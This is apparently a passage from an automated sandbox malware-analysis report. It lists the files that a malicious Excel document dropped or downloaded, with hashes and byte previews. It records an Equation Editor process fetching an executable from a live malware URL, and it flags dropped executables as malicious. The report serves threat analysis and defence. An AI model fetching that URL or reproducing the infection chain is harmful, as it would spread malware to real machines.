Preview:	6d15n35xEkeNzvd8QC944717Bh2FA0xw70aOlPK18GE476j31Ln35goNmgC7yE3H3yjvwObH7t0znM9i024r..8RI733eZy64eVk8pHX2w1SN5y6v6yNKdry7sIq6bGaKU6b965019b477O9B8P..n0ZH6GU1802M3nK9S0v5lo398C9052955p9f603b8CW3K..Volo5E8te4h6j95z7ZVlgh31Jn13KO90MH24gO1ng3nnE52fphIaR885A39UeNy2Q9m0860ah5qV21790rvhK31yO7Z745c72MqBmngr..2IKl67mKUK6s14WzI1kBr4MNgTP83133o40Vsc4VF9465nu..9575..g63DF6si6uA7THw5dhOXgww16771k6hpca8wdag3Y20wW245x61TN8236OiM8E9A69o8lUh29yGXR207Oo2fKM6x8baR2F8A6k39w0757aw0v..0H7P30G5146F971454dTaypI05wZ6g8YhhUPw030vH37GO510LHz43BU4nf7adSF23ceZjWW6NV8d0O8fY2gF2g402biuDsTK336912d78q0T2R0XR0L5N97igRC159yix7I96hLDd..

C:\Users\user\33920049\mmbdcs.xl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	548
Entropy (8bit):	5.47877878102614
Encrypted:	false
SSDEEP:
MD5:	1A4DB14134A67966C903508FF04DCB28
SHA1:	612D22CDCF9CA81EBB295642346E3F0F9214D522
SHA-256:	9C66FABC8AC533B56109E3BA00591892A18B30831DE74B933532C5727E0F4AC7
SHA-512:	3B3588CC2686AE47E1AA66DB11D2EBB662D0C8F99DA8049BC1D560289D9A06E194266260D918D515B3470C7684DD85FD989050BE63CEBF731D89A6761102EDEF
Malicious:	false
Preview:	09JF78Fh11lv273Ap1ugc9E7cGuu3..2tytW281h9C2PDSeI1lY1EVqZU..507ie6QZ889TNk3B91If1328iy39Xs8Yu4S88983G2916P25eY6k752X8zW08k3c7g33330om0d37L35Ki2Q791T48aO6b0S1r5UmSzw918VUxlH60Zr0V707Ad9t3vq62A51379S3g48580g6Xz9dX4aV5G15sS2K6rV7808ztG2howf42lydQp65..c950bpN27Zd5x16608tZ2BYeT51aisEmMJQ54k32Gj86M586D777E11221Kf7158Ef4Q6n740t4nhsjplG8..aD9O2o33Z03ry292VH0774ndw15ng5Pt61O127kc2O329355b56q42871SI13YswAz..jbp0jJk58X149s095365Tn0141cAZ7Cn71W47HVKMG0HaC4zi624d777g5G3135G63Y69RE09g9s30f6QQaU9q720E54fBQ0787U21HouAz1Wc08P3S1Qh8218a06NW4iDN27AX7uE3FtliR53..

C:\Users\user\33920049\mmuiqlcvwo.pif Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	777456
Entropy (8bit):	6.353934532007735
Encrypted:	false
SSDEEP:
MD5:	8E699954F6B5D64683412CC560938507
SHA1:	8CA6708B0F158EACCE3AC28B23C23ED42C168C29
SHA-256:	C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
SHA-512:	13035106149C8D336189B4A6BDAF25E10AC0B027BAEA963B3EC66A815A572426B2E9485258447CF1362802A0F03A2AA257B276057590663161D9D55D5B737B02
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 27%, Browse Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: KRSEL0000056286.JPG.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O.........."..................d....... ....@..........................0............@...@.......@.........................T................................c................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................R..............@..@.reloc...u.......v...H..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\33920049\qhqulleu.mp3 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	57578
Entropy (8bit):	5.578086176536263
Encrypted:	false
SSDEEP:
MD5:	5DC5D3365BAE36FC41072D92D22F69CB
SHA1:	91CE48060DCCCC9806AFB9979A3A1759041036DF
SHA-256:	067820A70679BC812C16421E4F759533DD91D8124ED36966436601B1F2013C94
SHA-512:	CE2119181FCBDA7C1B08068F918C7282DEFC8AD951E129458BB75F6CC9EC4CA105482B5F4AAC4C16E425736FA45DA790D10B4ED9346A93B23B4F4F713A912A85
Malicious:	false
Preview:	h2p1f27k11D4928Yg10sp4yM45..N0ev22LGA972g7108t53666312NEQ936013H6IGyekvJ71615uI45076O1PbOp00bA59fZew2Q3uW74G1..k861Wl190Fi62..u038289Po5303Y375wD97P2t0nAp79EjMGK3wI35dT61673071a86A620afy8DJ870rVU48212I8s..ncD25Fb62q65jJ0HVPugF6Yl7X7Eh0i993D1glNppq17371g73bR49xhOC7w18T9St7n7t6VA38VV077l5NF92F1F..e6Q3NRFdkG1n39Rd6h73S234193I5DKK125k40h0YM8838N3299r82GUBMO1Yp3G90Iw45xJ7P33jr6f54rDuo3GVzlg63J..j8A8nb2007l654wnz1y587053Z98G2W3Xy9800UO800f..4cB15n61ea13513367yB73oJVg6c..hOi4T720885078n0fh5i8Y8C5b235f8Y0..6PQm64Yx0AR5VCwDF77jt5TP41949X26Q1Fz3uz6059s8U364jW51iZep4dp7084LpOw..O4o2V8ELjw7l8111mlDOskR3Z0b369z4P43g220128bCH43235sh72Oz2B11Mo4d..5UK7HGAHv664260sU7J31..bP98bUe5lC4453Km3AGjhGF1bb58Qzj6k6C834Tg95..d0j10z556j2bC471373U8o8HhEi5222I1q3lUt262J803vC24t5dl6Q30eK0i6r3nMO8F141JLXg8DHv2M7Zy3s24..P0rW6Eh4XgHS9F4n79T8oQL0T9v3p77qi5fX888Zy17T3o58OQ69L213E7..qotNsDVE53Sqb17Pa42ZY6v4125671zj5S75..F3o864Et7a6069dE60Or8qp064D78XaH4EjN46493QX7DoM0SGp0881..Jqd84A2MR57zhMr96439g32590wWg025KOo768L987y6883

C:\Users\user\33920049\sdstvfk.ico Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.3732701590754415
Encrypted:	false
SSDEEP:
MD5:	84DFE2A08AFBC32793395799841D38E4
SHA1:	1E040C2A1032335F15C39C60A01343A58889B5DC
SHA-256:	AC294F23A91818659CFC3210CB058D3D9C7DDA4EF9D4CD933269C8428DED3AC5
SHA-512:	9B6B65C14499CCEB0FE8276CF33CE9B92091A7D1EB2BE8DE4497F7B418B57B70675BCF706425630D9210DF7EB1328E443F4D2F08B0CBD088DA579EAF086CE915
Malicious:	false
Preview:	1I533y4o2432sC09mPm14467Qm6RA4L3630s7YE9op7c6b35odL61Lv..E7R51t4675ep5Ne6BiS0EVrm7941A62Qm50xJP378E4830gEMF779o28LuQ85658RPRC5z5wEd607f9x27tEx8D542xU8xPHPe3o67493w47..m68nw5a8Y8EbK695k64w59v32815nelJ8iD81512w56m456Tm7JwER87Xn4g743VO..b582271uI6v1889C253tZu7Eol9r48z96EP902UcK8N4..Q99p11T43P4U9DdHofE6n0V7E688JLM77fJ1Bg1A27hI37H0CG12nJJ3..413p6It95893mo4w0O5P62957LSuqhwb006fPI0t3i9DXt1bo8wtD7MR3Zx20865TV4zn64V2ka5cHZ8zR5w58476k94u9RWF7Qd8763KL041A54pJU3fP824dlbfzgRBtpQ919S269X77SNg4975u0z276n8mo584012t3Er88LRv7o02V667..

C:\Users\user\33920049\srslmbkgam.xml Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	545
Entropy (8bit):	5.5258847043058905
Encrypted:	false
SSDEEP:
MD5:	B98459F0500F47B7B583B0C519CCF3CB
SHA1:	5D8012DB878B3F72B7A5736525F587330F988A96
SHA-256:	E52F7062BE09E0B5653629D3E3738EF2B514BA971CFA25EED7BE051466EE0E26
SHA-512:	C136360F2444CBB26A4DC20B7BBE04F1040D2F796D75FCE5274F612DB869E4943C7687E7AC457C705C5925545641A891E7CE242BAA2E7A993F9849F891E8D465
Malicious:	false
Preview:	GfD67N14eP8m1bN0fj0735N5f7v16q74W0C6Fs1q9l0o69se079um04K990PHo534Wi01vo5283qCXNJn83jG8m82PO61d1Si516K91925Qj542034Q5iq89tsas25j3WopZ65477Z08bF8mg48O9..vt1Ml5Z9yNR2m04028522aBAD99a8yr110Y655K5F8pDBr8wVJzJN75b1SDb7p616j10G18saj8x2In7wu2as1zt28768OU69P21D0Fj47Hmo6CVCz7yog178I25q68238TZ45fm7CC96P323948b8S3zK6xxz3..Z1C6n3556UD4dEJN7n5ZM7Lwdk11258DL9xP2uHt9D13L0GJ2HLiuOP8CyF1o9pT652GHr51TTl..QH2YsYeY2I6vg9..0e664n6Q39X5cs61w0Tc6A1nb1RZETK43DtvyY7OA35S15SLXM722on443pD183T88lFNr3b..4n766KanwrN8GUh21b2lzn0G691JTqM0xOe72G67e681m9242JaaxmlQTr32R511..

C:\Users\user\33920049\suktleoxtu.msc Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	540
Entropy (8bit):	5.547551481633137
Encrypted:	false
SSDEEP:
MD5:	BA57AA240C24091DC77E1E2EF7A99C10
SHA1:	A013814DFDF3086EA88DBAA42D1D5269CE08DC0D
SHA-256:	619C6857EA9C69C098E3AC990BE2B99B25EC1A75821081EAD723C9EF6F718FB2
SHA-512:	498B2133DDF75BB946A763216E8E757E902F7E6AEF565DB689B02B0A02526455EADAD1C1642924E7A611537428CF2D79B8314A7A05E041963F4D9328C61C4168
Malicious:	false
Preview:	7UeM9q9Mw18la8h385V2TY2J67875Z415miZD33XVD0fWsExvLj56QAB58zX50n866r0NMz3B91j75lAXO7664KTr03P97iu5a0e3ok9m1x8129442b30jF..bs835342OD650H5VCHlYXK5D9q4G0c4r365k4T5w6089C5ltN642O88P45K4d94fZ5D25Dp2x..o19q50od04s7y9uAfLrQ16c56n1J1Hw8501Va8Yhh..S002hzAenP3Vw8fbX26XmO3..6G07391a8EW371DR721Be1RrMyP7..zW017Nt62Z9m63V1B3KU58U52U67FRZRp6954lN4m3AnMWKz1Td5XR317VBtmPA47Tq3bRI5u..5221XFy1Ly4z3KR5898U54vHI1590032Q0A5J6J004FlS7FiSyZ34Z2R229KecLYwHuYohCaJ0y41344EOEH12107gfpU3B3t655Y3noEi92m1g5..7Jom47612d63Ulao436XWsS378O888QuW2Rt11526Hn302bDdS067x9..

C:\Users\user\33920049\ujhg.cpl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	535
Entropy (8bit):	5.501943056038449
Encrypted:	false
SSDEEP:
MD5:	5F2BBE62D3EB28228186CD6964305381
SHA1:	46E019DA6F7ECE17D7500B963C80FF076B3B449C
SHA-256:	68C1BA695059F1E975FA07FF00BF77FD3B6E56EA4940E9E4AB5F7AA0FA33416E
SHA-512:	2F5AD3C6E6602C9980C530CD9380FEAB3CCDF1C2D836174F25EBF30C924D08FB958235B27C016CF2A0EEC51BACF50DAC685546778B893567AE3B51A89BEE1A4B
Malicious:	false
Preview:	WYk9Z859egc932519..B1M893TLb60Wf52J8ek0NdwiS96mdZg2e6X3V4DQ2VK63x83ud6I7lI593y276RNF9f9Lyzof8xR7HQa..N5k36V5598E7m2Ge3sZnA1cR0X9A0840084Z4610jL3Y38ZtWkdx8W03CGX2C5p5bCy4992Eh6r93p9tim053v1KPOjlY6J2E9CscL2CD8J835FPZZD36tBAcE3r204118YY5Clk7718n8529957Y09Sge8gYEJO466L..dNXk7sz8P4O49..f4ipv3W5RpW67D3W2rRW97v75N2veXA2C..QZP0q13Qf5771nOH6Y1r324r4244134971S9137oajWV519gX83400I85a218uZUs279IFN96..p0HuyY80xR8V7v6lh90hHN4e7OL6jG745402303t23Cx738n2GQ52R69S8Y7Z8t874EBQYG4229Y250Du3vVQ587an210h4gko80F462F2cw4g49xM226E4k091W4092cauuq5zUZ0yDB..

C:\Users\user\33920049\vusklntwi.docx Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	554
Entropy (8bit):	5.451419215130869
Encrypted:	false
SSDEEP:
MD5:	9D55DE9BCF880293EFC22A6EDF63D727
SHA1:	91BFA94E624F6A6C9891922931A650F3BDF014AF
SHA-256:	2EF84FFD76915FDBBAF0CC328B1AD11F7F0967D295AC7077F68C44F2DA67B75F
SHA-512:	3303BDC222A120225D36B48C6DCB24388FEEB8BC90A5FC84D8174C9CE487645D9435B31482E5D64057B52727ACC5EAF782E4B07D74FC29B32314F361186DE9EE
Malicious:	false
Preview:	e970K3K6t9k2e7O15tdejT7Sn7Qq5APO42D5c8DI2fzf170P7dM5E3URj68949M63pB660308..0Z7nFeV2Aj4d45E50826tzsFsCPc95Od6GlD5568n52Zb572al7J0J26cMon4..1004c08I4Vc1vEb84a1O05D0929v1dyJ3UTASw95H4X6il2g5qExNde32LC..E0P9AHDhBC160i4up784p9oJ210L9q5n45q1RF31L6O980D51ll9l010621T69ldG2xIx78ffqsCFS45q91gZS85i6R3sQ98xCR66HW9wZ7auPo2e3s25g5u0d762507u00ziT24V..43093P76L72429500832170O89Tu2g375949v..35ln5As955lr0m8073125L228boRR8623c2y99W97zd3vCc5R1QLck4nPi7XsmTH354817AY25392CS00..2O56h1BS43V8xK7905G6Lk64Mye6SI830p8TLf13Z05oQ74oGN49D651WnZCp46aN8BMMTmKs7X02F635ZS4M07D48a0..

C:\Users\user\33920049\weqn.txt Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.441373794856656
Encrypted:	false
SSDEEP:
MD5:	E887844DDB3C6BC8C9BA7ABF0963B162
SHA1:	5B1955F3EC2985EDA50632650FB71150AD311794
SHA-256:	4E47AFF41CBC53A8C36A9F3446DB8EFCF8B4BADD7808F7B58D57BB6F4082CA1F
SHA-512:	5F856E4D003D5822FEC6CB2A4F633259073D3BDDA70C475449213247B69DB68429BBC487B6DEFB016984FDD539599C00AE54DC941E686A115DEB0C0FCF9ECB1B
Malicious:	false
Preview:	VP1g07wz1m0513k47YE8U851zGONd88Z5px79e2NjXh10s645JS0S7034NpbhvB09zFfF66h5aLQyJaVOBRC8o7088Q30uxsb08Isv0D613D0wC4965d63Y14Q2o583v3664v2229j11X027..7v8K42r01w7T5LN3Eni4i6qu0NZj30S7h84H7A2Gt11L26O6O56F46..2I83MCFHIt12qK028V141AxZ6HLD5..617284669S3o8669s4p4v1Q2ep4j9AK1r9pDaV797ADlp..oo6yHV670255r7sJjSt04Th4O644Q16Njs67OA8B1TtOmI0d5747bFL6kjm6765778jtU0t7415r545lqn3wx37Dxi53133N41dI9874v41iTD44XG51s8LxSg8Ce88X6y3752KC39Wf0Z54194yUS0t2H..cvFZz9g9J20eZ9JE2znZf8tT858064t3w9XN6Zj4S35083O428Yw76Ol5s916tP77o3b6O81798HR479p1132XHb30IfQk8Le07Emvxj8K8xE1065Sj1359Pk..

C:\Users\user\33920049\wsxedltsm.cpl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.5485404237595715
Encrypted:	false
SSDEEP:
MD5:	CEE5E8C575EC77654A20CB99615CEBF6
SHA1:	D43519CD61E556D88080FF2640150B2BBE34AE7D
SHA-256:	2A4C2DF427A70334733E5CB06304BFF74499D6850AE736F82B06A52B0D850D61
SHA-512:	573E6B89DC25A143F133993435C60719439EF51409199F433DFD12E772A4222F2DF8EEBDC155A42C102C17440A88B37B20F7BE698F368E34B174F0BD490BA0E8
Malicious:	false
Preview:	j29pidJ632cP7m999gkKsD0j6ghShsM38o7044RP7Ry1v0D888gk5htmLu663YfJhO06X446m494rW5q430s25224nA5oW246424z99b4P9zAu4EB4mF235YE764yX91e592790Ihqq893Z..T4bA1h5yY30ud1Tvjy154Dt77m922w607kylHTt65zj3p157727D361go3W3H276..Ha90V8hLz4c9Jm20xp957FDjDbQU75K5e19I2uCiqYcYnRzxG4wtX12X9m81TN32tH6..DuZb30cne54764I51E6C03OC1H6Wm35D..9M9mH5E9u9CT4ag00JHrjP804Qj62h9IwODNBQ01ub8211o4Vpa5lZ32v243x3kv26V7Mz3CWF106X5Q081BU2P7HgUU670739762Iec6jkup5VgFT611hA0cSK3Qy01BYz720na9FGc25s3Rb059M87b2BalfPH0rH6PI0K6v2aBeT4R602716..t1r6T88039gP9D0FS64p9475N8TCSJ34RrJ7tylz1cN954P1I93Qi34418xA0bR3Q077B2S03nw5cXNvEV8997yp2S8l7K3Jv7Yjy9I..

C:\Users\user\33920049\xtax.log Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	518
Entropy (8bit):	5.459797846755074
Encrypted:	false
SSDEEP:
MD5:	32834BAFB3B1871301A6BA9BEF2C5687
SHA1:	786CD933E49C5657480DB1485B0609F8DFEC11CE
SHA-256:	DF899EAC1B5F6515CBDA8B816319FF0F89D7FF9E4FBDAEC52C75E1505105CD95
SHA-512:	A3864E623BA6AD918138D3BFA27F8F2E7AFC4F2005BA7DB655D1798CEBB5CAFDBF06D44929364CF363AEFD3F7B4AB48C37B75B3548CA711E5C6B3AB68CEC1714
Malicious:	false
Preview:	909r1Px20Vlvk4D76LUZf57A31de05v0R7709Vp87M5t3r167Gb1wF24F573H0MiBP1al6x1l5142F6Hki..69kqz2S7IQ32t2YP58S4P2OC88MxtyYLNV6Rcl39564b85881x2216800eMh1519wQ24OQxher8l87B64L8be02406Iq..9wzX9PTl5..16x766JTG2I2l13885Tm69G4R4301657a39p3R38YIaD898fExjk7U8LO516629613D115o6WiB6F6043kq7f6TphpsG6V83..425be6T7gC64b703lXA1W1E9338S3c64O3c0B487ut5dK2vq4Ev4P5ZbwzxY2v5z78mg2rj860fmFhB3Tu2Gbzmv..1D82sAGc954k747g6a8F88c76au6O4h93306DJgBe54Ik2SU8rfE2On356ZsD3i2517eg3F2Py9007Zh2Oab5LR8494p0h72G894zZ38FZPQ3F80D1D7Wzc3Vs9867t6mlLttd2e4w6..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	1073384
Entropy (8bit):	7.832162830296474
Encrypted:	false
SSDEEP:
MD5:	B866823E1F8F4A52376BD108C457DD78
SHA1:	FE99849EC27630463080445337798EEBA8000A02
SHA-256:	EBE1BB18A77CF0B34D3AD06919A9ADFFF2AA69CFAFA5B96B670534B890E3E2A8
SHA-512:	FD1732CA7DC310395581D835EA3DF1E7AD664C75C9C7F68BA55C0B2E521383A0C8781B490F7CC05428D6E534B356A585BF11B57E57808CC37EA08DABF4A09E13
Malicious:	true
IE Cache URL:	https://demopicking.renova-sa.net/asdERTYgh56F.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}\|^.....................(............... ....@.......................................@.........................@...4...t...<.... ..(L...................p...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...(L... ...N..................@..@.reloc...!...p..."..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\asdERTYgh56F[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	258
Entropy (8bit):	5.197363170848063
Encrypted:	false
SSDEEP:
MD5:	4FAA690718E86B391CBF386BAB2C578D
SHA1:	3349E293E3E63929F8EDFCFA93CF393B0BACAC61
SHA-256:	F70CAB022EB2B94C482515B83655102FED91D729161C322273C6234B6FF00FDC
SHA-512:	655685251E747518F793EE0903CED5C17EEFF8787883309C0797F316A8654C9D095FCB86F0B0D144ABE5B4806DC9A1775A443A5A0DD6A5A0520668CAEC8409B4
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://demopicking.renova-sa.net/asdERTYgh56F.exe">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26B84B08.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0CBBE5F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B908FF69.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDBC2463.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF7984D4.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...